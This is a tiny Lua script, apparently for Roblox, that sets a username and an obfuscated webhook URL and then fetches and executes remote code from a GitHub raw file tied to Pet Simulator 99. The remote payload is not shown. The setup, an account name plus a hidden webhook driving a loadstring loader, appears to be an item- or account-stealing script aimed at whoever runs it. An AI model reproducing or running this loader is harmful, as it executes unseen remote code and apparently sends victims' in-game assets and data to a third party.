Username = "UglyAccount69"
Webhook = "https://webhook-protect.vercel.app/api/webhook?id=bnhwdG1PTUFaRTZmcTdDbWFLdmF1dzphaXBNSDVFV1dXTThrVnBKVjJSZUwzX3lsSzdUdTlzTmVpOVozRVpPLXlFMnlRS0dGblVTdnUweVFBX2pUck9adnB6VHRUR1hwWkEtUWlBdEZiM3p2OUlGMkpKYmtfcUF1VGZWZTdGdUd5OF9qZ3NJaFVZdU44bUVOVVBNcmpxRy1jY2NJVE5ibDZ6dFpHY1BlU1RtOS1jb2hCV1Rna0FjcGVON3M0OXlwZUU"

loadstring(game:HttpGet("https://raw.githubusercontent.com/surelyco/ps99/refs/heads/main/Rua99",true))()
